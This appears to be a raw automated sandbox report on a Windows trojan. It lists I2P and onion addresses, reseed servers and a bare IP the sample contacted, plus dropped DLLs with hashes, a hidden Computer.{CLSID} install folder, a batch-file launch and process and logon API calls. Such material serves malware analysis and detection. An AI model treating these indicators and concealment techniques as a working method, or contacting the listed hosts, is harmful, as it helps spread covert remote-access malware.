Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11505EEA recv,WSAGetLastError,23_2_00007FFE11505EEA
Source: global trafficHTTP traffic detected: GET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficDNS traffic detected: DNS query: banana.incognet.io
Source: global trafficDNS traffic detected: DNS query: reseed.diva.exchange
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000003.2278107155.00000157C5E73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2278195165.00000157C5E78000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: http://127.0.0.1:8118
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, 00000020.00000003.2796330606.00000142D8DAB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796297665.00000142D8DD6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796330606.00000142D8DA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txt?~
Source: main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtei
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtf?
Source: main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txty-
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3/)
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: Amcache.hve.31.drString found in binary or memory: http://upx.sf.net
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io/W
Source: main.exe, 00000017.00000002.2668284810.00000157C6271000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2292775303.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io/i2pseeds.su3
Source: main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2782368111.00000142D89FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io:443/i2pseeds.su3
Source: main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io:443/i2pseeds.su3W
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://i2p.ghativega.in/
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://i2p.novg.net/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.novg.net/K
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8D50000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-fr.i2pd.xyz/I
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/3
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/F
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.diva.exchange/b.c
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/6
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/L
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/%
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/O
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/w
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/HWUm~GTa
Source: main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/vp/p_lib.c
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2669826636.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drString found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/m
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93929A inet_addr,ntohl,5_2_00007FF64B93929A
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,5_2_00007FF64B93292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\t291wOio
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02734B560_2_02734B56
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02735B4A0_2_02735B4A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027453FA0_2_027453FA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0274702E0_2_0274702E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027360DA0_2_027360DA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0274D1320_2_0274D132
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02737F3A0_2_02737F3A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02739D020_2_02739D02
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0273CDB20_2_0273CDB2
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93E4E05_2_00007FF64B93E4E0
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93DE8A5_2_00007FF64B93DE8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AC1AB023_2_00007FF7C1AC1AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1ABC44023_2_00007FF7C1ABC440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1151088023_2_00007FFE11510880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BE24D023_2_00007FFE11BE24D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11ECEF6023_2_00007FFE11ECEF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126ECB1023_2_00007FFE126ECB10
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A4FEAA023_2_00007FFE1A4FEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A528F0E23_2_00007FFE1A528F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A528FFC23_2_00007FFE1A528FFC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A53048023_2_00007FFE1A530480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A528CDB23_2_00007FFE1A528CDB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A528DC623_2_00007FFE1A528DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1178088032_2_00007FFE11780880
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: String function: 00007FF64B9314E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF7C1AB2EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11BDC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE117740D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11EC9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE115040D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE1A5277A2 appears 388 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE126E2072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE1A4F1352 appears 398 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: evtsrv.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: w3LkirgH.23.drStatic PE information: Number of sections : 11 > 10
Source: TsG1eHIt.23.drStatic PE information: Number of sections : 11 > 10
Source: ogg99SMu.23.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: 6rRRlGVV.23.drStatic PE information: Number of sections : 11 > 10
Source: ROF9A37w.23.drStatic PE information: Number of sections : 11 > 10
Source: t291wOio.23.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: file.exeStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: bMZx4vGr.23.drStatic PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: eKTTDy2k.23.drStatic PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000000.1706105306.00000000008B0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exe, 00000000.00000002.1710097897.00000000025E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000001.00000002.2954243691.0000000002758000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exeBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@45/68@2/27
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B93855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,5_2_00007FF64B93855D
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B931A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,5_2_00007FF64B931A19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AB1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,23_2_00007FF7C1AB1DBC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AB1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,23_2_00007FF7C1AB1DBC
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess2656
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.batJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
